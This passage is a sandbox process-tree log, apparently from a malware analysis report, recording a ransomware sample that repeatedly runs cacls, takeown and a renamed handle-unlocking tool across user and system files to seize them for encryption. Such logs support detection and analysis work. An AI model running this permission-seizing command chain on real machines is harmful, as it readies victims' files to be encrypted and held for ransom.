    PID:8256
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000014.bin" -nobanner
      4⤵
      PID:8204
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""
  2⤵
  PID:8632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C
    3⤵
    PID:8336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"
    3⤵
    PID:8556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000058.bin" -nobanner
    3⤵
    PID:8524
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000058.bin" -nobanner
      4⤵
      PID:8516
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9036
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""
  2⤵
  PID:8664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C
    3⤵
    PID:8760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"
    3⤵
    PID:8628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000007E.bin" -nobanner
    3⤵
    PID:8588
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000007E.bin" -nobanner
      4⤵
      PID:8592
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""
  2⤵
  PID:6804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C
    3⤵
    PID:8780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000007O.bin" -nobanner
    3⤵
    PID:6704
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000007O.bin" -nobanner
      4⤵
      PID:9016
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""
  2⤵
  PID:8968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C
    3⤵
    PID:7092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000008D.bin" -nobanner
    3⤵
    PID:7472
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000008D.bin" -nobanner
      4⤵
      PID:4088
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""
  2⤵
  PID:8716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C
    3⤵
    PID:8344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"
    3⤵
    PID:8964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000008N.bin" -nobanner
    3⤵
    PID:4220
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000008N.bin" -nobanner
      4⤵
      PID:3444
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""
  2⤵
  PID:4036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C
    3⤵
    PID:8360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"
    3⤵
    PID:6604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000093.bin" -nobanner
    3⤵
    PID:5508
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000093.bin" -nobanner
      4⤵
      PID:2596
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""
  2⤵
  PID:2856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"
    3⤵
    PID:7504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000A9.bin" -nobanner
    3⤵
    PID:6256
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000A9.bin" -nobanner
      4⤵
      PID:6184
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:6916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:7356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    PID:6240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2148
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5232
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:7912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:8028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    - Modifies file permissions
    PID:5820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5544
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4648
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""
  2⤵
  PID:5848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:7096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"
    3⤵
    - Modifies file permissions
    PID:8148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
    3⤵
    PID:6876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
      4⤵
      PID:4900
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""
  2⤵
  PID:5688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:6816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"
    3⤵
    PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
    3⤵
    PID:7596
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
      4⤵
      PID:7732
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""
  2⤵
  PID:7560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:7564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"
    3⤵
    - Modifies file permissions
    PID:7864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
    3⤵
    PID:5956
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
      4⤵
      PID:7616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl""
  2⤵
  PID:7300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl" /E /G Admin:F /C
    3⤵
    PID:7784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl"
    3⤵
    PID:8724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl" -nobanner
    3⤵
    PID:8168
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl" -nobanner
      4⤵
      PID:8248
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:7336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:6356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    PID:8116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:7272
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:7664
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:5172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    PID:532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6972
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:7316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:8076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:7276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    PID:7284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6172
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5208
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  2⤵
  PID:7268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
    3⤵
    - Modifies file permissions
    PID:6156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    3⤵
    PID:5176
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftNotepad.xml" -nobanner
      4⤵
      PID:6608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  2⤵
  PID:6168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:5204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    3⤵
    PID:5968
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
      4⤵
      PID:5484
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  2⤵
  PID:9104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
    3⤵
    PID:6428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
    3⤵
    PID:5780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "NetworkPrinters.xml" -nobanner
    3⤵
    PID:5700
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "NetworkPrinters.xml" -nobanner
      4⤵
      PID:9060
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl""
  2⤵
  PID:9140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl" /E /G Admin:F /C
    3⤵
    PID:8860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl"
    3⤵
    PID:8808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl" -nobanner
    3⤵
    PID:6296
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl" -nobanner
      4⤵
      PID:8876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin""
  2⤵
  PID:624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin" /E /G Admin:F /C
    3⤵
    PID:9172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin"
    3⤵
    - Modifies file permissions
    PID:6416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000D.bin" -nobanner
    3⤵
    PID:5180
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000D.bin" -nobanner
      4⤵
      PID:9072
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin""
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin" /E /G Admin:F /C
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin"
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000P.bin" -nobanner
    3⤵
    PID:6440
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000P.bin" -nobanner
      4⤵
      PID:9176
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin""
  2⤵
  PID:5960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin" /E /G Admin:F /C
    3⤵
    PID:8060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin"
    3⤵
    - Modifies file permissions
    PID:9204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000013.bin" -nobanner
    3⤵
    PID:7184
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000013.bin" -nobanner
      4⤵
      PID:8108
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin""
  2⤵
  PID:6560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin" /E /G Admin:F /C
    3⤵
    PID:6924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin"
    3⤵
    - Modifies file permissions
    PID:8804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000006F.bin" -nobanner
    3⤵
    PID:284
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000006F.bin" -nobanner
      4⤵
      PID:8436
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6500
- C:\Windows\SysWOW64\cmd.exe
